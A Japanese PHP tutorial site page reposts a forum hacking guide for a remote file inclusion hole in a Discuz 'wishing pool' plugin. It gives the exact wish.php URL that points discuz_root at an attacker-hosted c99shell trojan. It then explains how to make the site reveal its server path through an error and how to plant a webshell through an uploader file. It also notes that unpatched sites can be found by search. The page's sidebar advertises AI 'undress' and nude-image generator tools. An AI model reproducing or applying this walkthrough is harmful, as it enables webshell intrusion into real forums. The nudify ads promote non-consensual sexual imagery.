Discuz プラグインの脆弱性攻撃_PHP チュートリアル-PHPチュートリアル-php.cn

ホームページ

バックエンド開発

PHPチュートリアル

Discuz プラグインの脆弱性攻撃_PHP チュートリアル

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB

Jul 13, 2016 pm 05:08 PM

discuzプラグイン攻撃持っている抜け穴これ

PS: そういえば、「Hacker X-Files」はこの脆弱性について N 回言及しましたね、笑...
誰かがそれを発表し、誰かがエクスプロイトプログラムを書いたこともあるので、ソースを教えてもらいましたので発表します！ by Gui Zai Firefox の誰かがこの穴を発見したようです。よくわかりません
discuz フォーラムの wishing pool プラグインには、DZ ルートディレクトリに wish.php ファイルがあります。 :
require $discuz_root. './include/discuzcode.func.php';
これは完全なリモートインクルージョンの脆弱性であることは明らかです:
http: //www.163.com/wish.php ?discuz_root=http://www.flyt.cn/xxxx.txt?
xxxx.txt は私の PHP トロイの木馬、c99shell であることを忘れないでください。理由はわかりませんが、成功しませんでした。慎重に実験しなかったことが原因かもしれませんが、「WebShell」は入手できます。 Security Angel の PHP バックドアを使用すると実際の Web シェルをアップロードできないため、次のファイルを使用して Web シェルをアップロードできます。 Web サイトのディレクトリに移動します。

Web サイトの実際のパスを取得する方法は非常に簡単です。 http://www.163.com を開きます。 /wish.php?discuz_root=http://www.flyt.cn/xxxx.txt の最後に疑問符を付けないと、プログラムがエラーを報告し、Web サイトの実際のパスが表示されることがわかります。ファイル内の C:Inetpubvhosts aidu.com bs
は、ハッキングする Web サイトの実際のパスになります。 cntink.php は、アップロードした Web シェルです。保存したい名前は何でも選択できます。
上記のファイルを txt として保存します。 (他の拡張子も使用できます) それを自分の Web サイトにアップロードします。たとえば、fly.txt という名前を付けて、
http:// www.163.com/wish.php?discuz_root=http:// と開きます。 www.flyt.cn/fly.txt?
OK... アップロードダイアログボックスが表示されます。Web シェルをゆっくりアップロードしてください。アップロード後のパスは、fly.txt で設定したパスです。
上記の記事は、まったくランダムに書いています。誰かがこの方法を使用してサイトをハッキングして問題を抱えている場合は、私のところに来ないでください...実際、これはパッチがリリースされた後に公開されるべきですが、これは公式のプラグインではなく、他の人がすでに投稿されているので問題ありません!
追記: グループ内の特定の人の言葉を引用すると、Baidu と Google はディスクの URL: wish.php を検索しましたが、抜け穴は修正されていません。

http://www.bkjia.com/PHPjc/629813.html
www.bkjia.com

声明

この記事の内容はネチズンが自主的に寄稿したものであり、著作権は原著者に帰属します。このサイトは、それに相当する法的責任を負いません。盗作または侵害の疑いのあるコンテンツを見つけた場合は、admin@php.cn までご連絡ください。

PHPの継続的な使用：その持久力の理由Apr 19, 2025 am 12:23 AM

まだ人気があるのは、使いやすさ、柔軟性、強力なエコシステムです。 1）使いやすさとシンプルな構文により、初心者にとって最初の選択肢になります。 2）Web開発、HTTP要求とデータベースとの優れた相互作用と密接に統合されています。 3）巨大なエコシステムは、豊富なツールとライブラリを提供します。 4）アクティブなコミュニティとオープンソースの性質は、それらを新しいニーズとテクノロジーの傾向に適応させます。

PHPおよびPython：類似点と相違点を調査しますApr 19, 2025 am 12:21 AM

PHPとPythonはどちらも、Web開発、データ処理、自動化タスクで広く使用されている高レベルのプログラミング言語です。 1.PHPは、ダイナミックウェブサイトとコンテンツ管理システムの構築によく使用されますが、PythonはWebフレームワークとデータサイエンスの構築に使用されることがよくあります。 2.PHPはエコーを使用してコンテンツを出力し、Pythonは印刷を使用します。 3.両方ともオブジェクト指向プログラミングをサポートしますが、構文とキーワードは異なります。 4。PHPは弱いタイプの変換をサポートしますが、Pythonはより厳しくなります。 5. PHPパフォーマンスの最適化には、Opcacheおよび非同期プログラミングの使用が含まれますが、PythonはCprofileおよび非同期プログラミングを使用します。

PHPおよびPython：さまざまなパラダイムが説明されていますApr 18, 2025 am 12:26 AM

PHPは主に手順プログラミングですが、オブジェクト指向プログラミング（OOP）もサポートしています。 Pythonは、OOP、機能、手続き上のプログラミングなど、さまざまなパラダイムをサポートしています。 PHPはWeb開発に適しており、Pythonはデータ分析や機械学習などのさまざまなアプリケーションに適しています。

PHPとPython：彼らの歴史を深く掘り下げますApr 18, 2025 am 12:25 AM

PHPは1994年に発信され、Rasmuslerdorfによって開発されました。もともとはウェブサイトの訪問者を追跡するために使用され、サーバー側のスクリプト言語に徐々に進化し、Web開発で広く使用されていました。 Pythonは、1980年代後半にGuidovan Rossumによって開発され、1991年に最初にリリースされました。コードの読みやすさとシンプルさを強調し、科学的コンピューティング、データ分析、その他の分野に適しています。

PHPとPythonの選択：ガイドApr 18, 2025 am 12:24 AM

PHPはWeb開発と迅速なプロトタイピングに適しており、Pythonはデータサイエンスと機械学習に適しています。 1.PHPは、単純な構文と迅速な開発に適した動的なWeb開発に使用されます。 2。Pythonには簡潔な構文があり、複数のフィールドに適しており、強力なライブラリエコシステムがあります。

PHPとフレームワーク：言語の近代化Apr 18, 2025 am 12:14 AM

PHPは、多数のWebサイトとアプリケーションをサポートし、フレームワークを通じて開発ニーズに適応するため、近代化プロセスで依然として重要です。 1.PHP7はパフォーマンスを向上させ、新機能を紹介します。 2。Laravel、Symfony、Codeigniterなどの最新のフレームワークは、開発を簡素化し、コードの品質を向上させます。 3.パフォーマンスの最適化とベストプラクティスは、アプリケーションの効率をさらに改善します。

PHPの影響：Web開発などApr 18, 2025 am 12:10 AM

phphassiblasifly-impactedwebdevevermentandsbeyondit.1）itpowersmajorplatformslikewordpratsandexcelsindatabase interactions.2）php'sadaptableability allowsitale forlargeapplicationsusingframeworkslikelavel.3）

スカラータイプ、リターンタイプ、ユニオンタイプ、ヌル可能なタイプなど、PHPタイプのヒントはどのように機能しますか？Apr 17, 2025 am 12:25 AM

PHPタイプは、コードの品質と読みやすさを向上させるためのプロンプトがあります。 1）スカラータイプのヒント：php7.0であるため、基本データ型は、int、floatなどの関数パラメーターで指定できます。 3）ユニオンタイプのプロンプト：PHP8.0であるため、関数パラメーターまたは戻り値で複数のタイプを指定することができます。 4）Nullable Typeプロンプト：null値を含めることができ、null値を返す可能性のある機能を処理できます。

See all articles

ホットAIツール

Undresser.AI Undress

リアルなヌード写真を作成する AI 搭載アプリ

AI Clothes Remover

写真から衣服を削除するオンライン AI ツール。

Undress AI Tool

脱衣画像を無料で

Clothoff.io

AI衣類リムーバー

AI Hentai Generator

AIヘンタイを無料で生成します。

ホットツール

Dreamweaver Mac版

ビジュアル Web 開発ツール

メモ帳++7.3.1

使いやすく無料のコードエディター

mPDF

mPDF は、UTF-8 でエンコードされた HTML から PDF ファイルを生成できる PHP ライブラリです。オリジナルの作者である Ian Back は、Web サイトから「オンザフライ」で PDF ファイルを出力し、さまざまな言語を処理するために mPDF を作成しました。 HTML2FPDF などのオリジナルのスクリプトよりも遅く、Unicode フォントを使用すると生成されるファイルが大きくなりますが、CSS スタイルなどをサポートし、多くの機能強化が施されています。 RTL (アラビア語とヘブライ語) や CJK (中国語、日本語、韓国語) を含むほぼすべての言語をサポートします。ネストされたブロックレベル要素 (P、DIV など) をサポートします。